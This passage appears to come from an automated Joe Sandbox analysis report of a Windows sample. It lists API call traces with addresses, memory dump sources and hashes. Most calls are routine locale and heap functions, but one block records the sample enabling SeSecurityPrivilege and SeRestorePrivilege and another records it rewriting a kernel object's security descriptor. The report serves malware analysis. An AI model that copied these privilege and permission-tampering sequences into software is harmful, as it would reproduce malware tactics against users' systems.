                                        • GetLastError.KERNEL32 ref: 004190E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID: pVA
                                        • API String ID: 2976181284-1183464086
                                        • Opcode ID: 131327f381336626f51c1b1e4d4a234bfad70b39e4a78b2d7dc9e93e7cbb53e2
                                        • Instruction ID: fa06997a6f1e68cb521b0c2e02ae2bf62f6d0eade7be31b879ca3dfd74e60512
                                        • Opcode Fuzzy Hash: 131327f381336626f51c1b1e4d4a234bfad70b39e4a78b2d7dc9e93e7cbb53e2
                                        • Instruction Fuzzy Hash: 0F1104356082026BD710CBB8DCA8B993B94AB05328F64462EF521C72D2DB78DCC5D709
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,004148D6,00000000), ref: 00417646
                                          • Part of subcall function 004174ED: GetVersionExA.KERNEL32 ref: 0041750C
                                        • HeapDestroy.KERNEL32 ref: 00417685
                                          • Part of subcall function 00417692: HeapAlloc.KERNEL32(00000000,00000140,0041766E,000003F8), ref: 0041769F
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Heap$AllocCreateDestroyVersion
                                        • String ID:
                                        • API String ID: 2507506473-0
                                        • Opcode ID: be7ba36ee05323b4acf4cd4af1487bb129e21c23fd765112a91abd45a39af523
                                        • Instruction ID: c639374c03c1bbca960cdedcb2ad31ff4a57a72680c20006ab14361f52bc4f08
                                        • Opcode Fuzzy Hash: be7ba36ee05323b4acf4cd4af1487bb129e21c23fd765112a91abd45a39af523
                                        • Instruction Fuzzy Hash: 4AF09B71A9C701AADF245F795D057E736F197447A5F11843BF940C41A0EF7C84D0991E
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5), ref: 00411DA5
                                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000), ref: 00411DB1
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: BufferConsoleHandleInfoScreen
                                        • String ID:
                                        • API String ID: 3205511803-0
                                        • Opcode ID: 6091993d0407b41d1096e467bcedc417f69b3cc921582001fceb4dbf2f452062
                                        • Instruction ID: 2683345625bb2b6ff7a4569ee6bc74124bc6c5927012fb1b6a6cc8e947cd4d2d
                                        • Opcode Fuzzy Hash: 6091993d0407b41d1096e467bcedc417f69b3cc921582001fceb4dbf2f452062
                                        • Instruction Fuzzy Hash: C8F0303420C2619B8708DF6CD88457FBBE4FF85B02F44892DF899C2254E678D444C616
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,00000100,00000000,?,00000000,0041BA87,00000000), ref: 00419CD3
                                        • GetLastError.KERNEL32(?,00000000,0041BA87,00000000), ref: 00419CDD
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast
                                        • String ID:
                                        • API String ID: 918212764-0
                                        • Opcode ID: f9b6bb7d8100d4bbecf413796a04f0f93ba1cbe6bc72e755fd6993f7c43df49d
                                        • Instruction ID: 0a7daf000d88186497e87b0e4d2920fdb345bf05d39154690c4c97767af7b358
                                        • Opcode Fuzzy Hash: f9b6bb7d8100d4bbecf413796a04f0f93ba1cbe6bc72e755fd6993f7c43df49d
                                        • Instruction Fuzzy Hash: C61159327042046BD3109BA5FC59BEA37A89F9272DF24421FE451872C1EBBD9CC1919D
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,00413296,000000E0,00413283,?,00418AD9,00000100), ref: 0041331E
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 10cd39a4e3fb8dc6af8208fefe4471acc436069d1523d61133af57c11b9b0b1b
                                        • Instruction ID: 48b680421b518da560860e7c6281a74435bf10b9df979dcfe3be48ef626c488a
                                        • Opcode Fuzzy Hash: 10cd39a4e3fb8dc6af8208fefe4471acc436069d1523d61133af57c11b9b0b1b
                                        • Instruction Fuzzy Hash: 10F0F932A4522866EA20AF146D417CB6B54AB04725F160123FC60BB2D0CB28FDD1928D
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,00000000,004125D0), ref: 0041283A
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00412841
                                        • LookupPrivilegeValueA.ADVAPI32 ref: 00412874
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00412898
                                        • GetLastError.KERNEL32 ref: 0041289E
                                        • CloseHandle.KERNEL32(?), ref: 004128B3
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,00000000), ref: 004128D5
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004128ED
                                        • GetLastError.KERNEL32 ref: 004128F3
                                        • CloseHandle.KERNEL32(?), ref: 00412908
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Token$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesProcessValue$CurrentOpen
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 1809565852-639343689
                                        • Opcode ID: 0038326b2359d2eb237540bc216a645e7a39cfe756c0de5b997349a01dd5918c
                                        • Instruction ID: 14832d4c124a178f5e51333f31e844f1366d56099beffb2702e6ad8efb91e307
                                        • Opcode Fuzzy Hash: 0038326b2359d2eb237540bc216a645e7a39cfe756c0de5b997349a01dd5918c
                                        • Instruction Fuzzy Hash: 8621B3B5350305BBE610DB65DC05FEB7798AB84B50F408829FA00C61D0DBF4E4598B7D
                                        APIs
                                        • CreateFileA.KERNEL32(00000008,010E0000,00000005,00000000,00000003,02000000,00000000,76EBFFB0,00000000,00000001,76EBE820,004124B5,?,?), ref: 0041261C
                                        • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,00000000,?), ref: 00412643
                                        • GetLastError.KERNEL32 ref: 00412645
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00412657
                                        • HeapAlloc.KERNEL32(00000000), ref: 0041265E
                                        • GetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000,?,?), ref: 00412678
                                        • SetKernelObjectSecurity.ADVAPI32(00000000,0000000F,00000000), ref: 00412682
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00412697
                                        • HeapFree.KERNEL32(00000000), ref: 0041269E
                                        • CloseHandle.KERNEL32(00000000), ref: 004126A5
                                        • CreateFileA.KERNEL32(00000008,01000000,00000007,00000000,00000003,00000000,00000000), ref: 004126C0
                                        • CloseHandle.KERNEL32(00000000), ref: 004126C8
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: Heap$KernelObjectSecurity$CloseCreateFileHandleProcess$AllocErrorFreeLast
                                        • String ID:
                                        • API String ID: 1259232358-0
                                        • Opcode ID: 2d09ea0bb7638fb770d8096d7de764fb49fa537e4193b44c19bd0124d84c7172
                                        • Instruction ID: 8f95d78b3328024af2753c56ff7b2632f9dbad148f303ec9c12ad49708251d75
                                        • Opcode Fuzzy Hash: 2d09ea0bb7638fb770d8096d7de764fb49fa537e4193b44c19bd0124d84c7172
                                        • Instruction Fuzzy Hash: 1521E271240315BBE7208F65DC49FEB7BA8EF89B11F108525FA04DA1D0D7F4E8018728
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BC86
                                        • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 0041BC99
                                        • GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCC0
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 0041BCE9
                                        • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1691099609-0
                                        • Opcode ID: ff77e7eca9720c41c7d5f443828ee78ae5fb6385ae2af7653d22f72767a37d0e
                                        • Instruction ID: 958d6847a000fbb349c9dbb8f7dd6cc025be0d133b592c5778a926ff2135057d
                                        • Opcode Fuzzy Hash: ff77e7eca9720c41c7d5f443828ee78ae5fb6385ae2af7653d22f72767a37d0e
                                        • Instruction Fuzzy Hash: 4E318B31601229FBCF228F56DC49EDF7F74FB09B60F108526F915922A0D7788991CAE9
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB73
                                        • GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BB86
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBAD
                                        • GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,004290CC,00000001,00000004,00000000,?,?,00000001), ref: 0041BBD2
                                        • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 1691099609-0
                                        • Opcode ID: 6176acd9af39b3310e1670d104befc426a1c5ec8e1d33516a1e498ba842b64ba
                                        • Instruction ID: 80d035fc61a38f0af9f2ad217f61039d53b68e42f171c84ccbdcf7cbbead4454
                                        • Opcode Fuzzy Hash: 6176acd9af39b3310e1670d104befc426a1c5ec8e1d33516a1e498ba842b64ba
                                        • Instruction Fuzzy Hash: E7319C31500209EBCF228F56CD45EEF7F75EB49B50F10852AF811922A0D7798991DBE9
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 00416D7F
                                        • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416DC5
                                        • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000078), ref: 00416E96
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 9f90090d993ac7c305df7442b75dd3576b7d9cefd0c5a0f2cde790dcd44f731c
                                        • Instruction ID: dc89844be1d73419b197e80717226bdb5770609426176513082cb7a3ad8c00c6
                                        • Opcode Fuzzy Hash: 9f90090d993ac7c305df7442b75dd3576b7d9cefd0c5a0f2cde790dcd44f731c
                                        • Instruction Fuzzy Hash: 7E5194727556015AEB31DB25EC41AEF3BADEB10715F56013FE800C22A1DFA9C8C68B1C
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 0041BD2C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 0041BD52
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharInfoLocaleMultiWide
                                        • String ID:
                                        • API String ID: 1196101659-0
                                        • Opcode ID: 5558466f0abd7b7493cc2bf79b0dddd4ae8569c55b6816c0c4c658fb69c1a660
                                        • Instruction ID: 31d47ac3fd5b94ecb22742bb44b162820398262bd93f2cf498d786ba73a29fe5
                                        • Opcode Fuzzy Hash: 5558466f0abd7b7493cc2bf79b0dddd4ae8569c55b6816c0c4c658fb69c1a660
                                        • Instruction Fuzzy Hash: 62F09A32901229FBCF264F82EC09ADF7F30FB85760F008226F922621A0C7344861CAE5
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(?,?,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC13
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,004290CC,?,004290CC,00000001,00000004,00000000,?,?), ref: 0041BC34
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: ByteCharInfoLocaleMultiWide
                                        • String ID:
                                        • API String ID: 1196101659-0
                                        • Opcode ID: 9eb92b3a7cf15e53121553cd13144aa6582e0c2c1dfe65d05ee3244f637f7b10
                                        • Instruction ID: 2d6427f8aa20fe1414e29516085f7d604162f02af8a5e6752e54a78417984fb5
                                        • Opcode Fuzzy Hash: 9eb92b3a7cf15e53121553cd13144aa6582e0c2c1dfe65d05ee3244f637f7b10
                                        • Instruction Fuzzy Hash: 36F03035900219EACF318F56DD05ADFBF31FB45760F10462AF925621E0EB354851DAD5
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0041729D
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: d11bff62c67589dcc09ef5241ee42cdf9f88c74ae04b8c5d5c73e73f0cd26bfb
                                        • Instruction ID: 75be6c02beabf803a7fc4e96b9c3a42d32ccb8a068e701f6d51d91f6728dc3c2
                                        • Opcode Fuzzy Hash: d11bff62c67589dcc09ef5241ee42cdf9f88c74ae04b8c5d5c73e73f0cd26bfb
                                        • Instruction Fuzzy Hash: EE216B3260C0059BDB284A38DD856F67775DB44341B494477FD02CA292E73AEED2D29D
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,-00001001,?,00000078), ref: 00416FD7
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 893157f915b6c02fd5ada0d35b3ef127db9ceb61bb3db7cdc74c10e6e612357b
                                        • Instruction ID: 8b9f09be45cda31c8b1cf3b17cd73bbf62894201d141fe0e773e0c3f75cf106f
                                        • Opcode Fuzzy Hash: 893157f915b6c02fd5ada0d35b3ef127db9ceb61bb3db7cdc74c10e6e612357b
                                        • Instruction Fuzzy Hash: E411B672B692016AE7309B25EC41AEB3BACEB14755F55003FF801D11A1EBA9C4C68B5D
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,-00001002,?,00000078), ref: 004170CB
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 63507c303ede3921caba65f6ce60eb42d96a0c8cb0d7c1e69e731b16ec258969
                                        • Instruction ID: 81850ce66d6ca33ab545172f8868e9d86e81415df962d95f81e3ad912132f72d
                                        • Opcode Fuzzy Hash: 63507c303ede3921caba65f6ce60eb42d96a0c8cb0d7c1e69e731b16ec258969
                                        • Instruction Fuzzy Hash: 7A01F7736291116AE7309B34EC02AEB37ACEB10755B61413FF800C5191DFA888C68B48
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,00000001,?,00000078), ref: 004171DE
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 719b2f718b54a4177c125953744089af908c5c417972cf9d9832ab5408b7d0b0
                                        • Instruction ID: 6978367b58e2c2410655e08ecac337e351e9f268a727dde218835fb005340b87
                                        • Opcode Fuzzy Hash: 719b2f718b54a4177c125953744089af908c5c417972cf9d9832ab5408b7d0b0
                                        • Instruction Fuzzy Hash: 56F09632948204AAEF31ABB4EC46BCA37B9AB00754F14447BFA10E61D0DA79D4C1CA88
                                        APIs
                                        • EnumSystemLocalesA.KERNEL32(00416D51,00000001,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416D30
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: a7bb0882fa0fdb173d73acf3e9cadf1c318318983cd881b0aac2a392fc96364d
                                        • Instruction ID: d2e323bb029e7b0a897126f847bf2f891343e842901ec26812400a6b3106f349
                                        • Opcode Fuzzy Hash: a7bb0882fa0fdb173d73acf3e9cadf1c318318983cd881b0aac2a392fc96364d
                                        • Instruction Fuzzy Hash: 2CF081717612128AD7249F35FC0A7A937A5BB10706F96053EE410C61B0CFF884C68A0C
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000400,00000021,?,00000002,00000000,0040941D), ref: 00411CBF
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_52_2_400000_azvw.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: f64141a690a3e9232ea995137bec61b94daafc7312ef2b75c4abfc6c2b8b1334
                                        • Instruction ID: b26c8389b7bf11535142398e37757b6b2d15ac830af8ac7aefcefff00ae82d06
                                        • Opcode Fuzzy Hash: f64141a690a3e9232ea995137bec61b94daafc7312ef2b75c4abfc6c2b8b1334
                                        • Instruction Fuzzy Hash: C6E0CD723A150116F72447A4C8C5BF36794F740301F18442BF307C96D0E55CCC81912C
                                        APIs
                                        • EnumSystemLocalesA.KERNEL32(00416FAB,00000001,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416F94
                                        Memory Dump Source
                                        • Source File: 00000034.00000002.2795391480.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000034.00000002.2795316110.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795414368.000000000041E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795472621.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmpDownload File
